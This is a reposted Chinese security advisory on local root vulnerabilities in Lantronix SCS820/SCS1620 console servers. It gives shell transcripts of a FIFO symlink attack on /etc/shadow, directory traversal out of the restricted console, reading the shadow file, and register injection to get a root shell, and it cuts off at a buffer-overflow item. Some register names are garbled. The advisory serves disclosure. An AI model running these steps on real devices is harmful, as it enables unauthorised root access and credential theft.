Lantronix Secure Console Server SCS820/SCS162…

2008-04-09 04:15:07来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Lantronix Secure Console Server SCS820/SCS1620多个本地安全漏洞

发布日期:2005-08-08
更新日期:2005-08-08

受影响系统:
Lantronix Secure Console Server SCS820
Lantronix Secure Console Server SCS1620
描述:
BUGTRAQ ID: 14486

SCS820和SCS1620是ActiveLinx家族安全控制台服务器(SCS)的成员,用于处理本地和远程的IT事件。

Lantronix Secure Console Server中存在多个安全漏洞,允许攻击者通过缓冲区溢出和不安全的文件系统配置获得root权限。

1 覆盖root用户的文件
----------
[c0ntex@SCS1620 /tmp]$ ls -al
total 2
drwxrwxrwx 2 root root 1024 Oct 31 00:50 ./
drwxr-xr-x 16 root root 1024 Oct 20 11:38 ../
prw-rw-rw- 1 root root 0 Oct 31 00:14 listen_fifo_server|


[c0ntex@SCS1620 /tmp]$ mv listen_fifo_server listen_fifo_server.orig
[c0ntex@SCS1620 /tmp]$ ln -s /etc/shadow listen_fifo_server

现在用户在等待系统管理员登录以入侵控制台:

sysadmin>listen 01
Please wait for connection..
sysadmin-DEVICE_01>logout

[sysadmin@SCS1620 /tmp]$ su - root
Password:
su: incorrect password # odd......

另一个窗口:

[root@SCS1620 /tmp]# head /etc/shadow
j /tmp/listen_fifo_5226;DEVICE_0121:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
adm:*:11529:0:99999:7:::

2 目录遍历获得基础系统的访问
----------
c0ntex>?
Commands:
alias - List command aliases
cat - Print history buffer
clear - Clear port buffer
connections - show active connections
...
c0ntex>/bin/bash
/bin/bash: unknown command
c0ntex>
c0ntex>
c0ntex>../../../bin/bash
[c0ntex@SCS1620 /var/tmp]$

3 Sysadmin变为root
----------
sysadmin>
sysadmin>
sysadmin>bash
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$
sysadmin@SCS1620 /var/tmp$ exit
sysadmin>../../../bin/cat /etc/shadow
root:$1$kjhfiusdhf9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
sysadmin>../../../bin/vi
~
~
~
~
~
:!cat /etc/shadow
root:$1$kjhsfsdfsdff9hs9f898ufs89ujfoj292020i2krp.:12721:0:99999:7:-1:-1:134550324
bin:*:11529:0:99999:7:::
daemon:*:11529:0:99999:7:::
...
~
~
~
~
~
:q!

从ci接口和strace以sysadmin运行bash,得到以下内容:

sysadmin>bash
...
14441 [400d8367] getuid() = 500
14441 [400f775b] setresuid(ruid 4294967295, euid 500, suid 4294967295) = 0

通过目录遍历:

sysadmin> ../../../bin/bash
...
14392 [400ab367] getuid() = 500
14392 [400ab3c7] getgid() = 100
14392 [400ab397] geteuid() = 0
14392 [400ab3f7] getegid() = 100
...

sysadmin>../../../home/sysadmin/snakeoil 10719

Attached process [10719] OK!
Stack regsiters for PID of [10719]
Stack Address of 陎 = [0xfffffe00]
Stack Address of 靫 = [0xbffff100]
Stack Address of 韝 = [0x00000000]
Stack Address of 離 = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of 雙 = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of 韎 = [0xffffffff]
Stack Address of %eip = [0x400d79a9]

Injecting %eip register with [0xbffff2bb]

Stack regsiters for PID of [10719]
Stack Address of 陎 = [0xfffffe00]
Stack Address of 靫 = [0xbffff100]
Stack Address of 韝 = [0x00000000]
Stack Address of 離 = [0xffffffff]
Stack Address of %esp = [0xbffff0c8]
Stack Address of 雙 = [0xbffff0e8]
Stack Address of %esi = [0x00000000]
Stack Address of 韎 = [0xffffffff]
Stack Address of %eip = [0xbffff2bb]
Detached process [10719] OK!

bash#

4 通过edituser二进制程序中的缓冲区溢出成为root用户

[sysadmin@SCS1620 /usr/local/bin]$ ls -al edituser
-rwsr-xr-x 1 root root 12912 Apr 15 2003 edituser
[sysadmin@SCS1620 /usr/local/bin]$ su - c0ntex

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Novell GroupWise客户端本地整数溢出漏洞

下一篇:EMC Navisphere Manager目录遍历和信息泄漏漏洞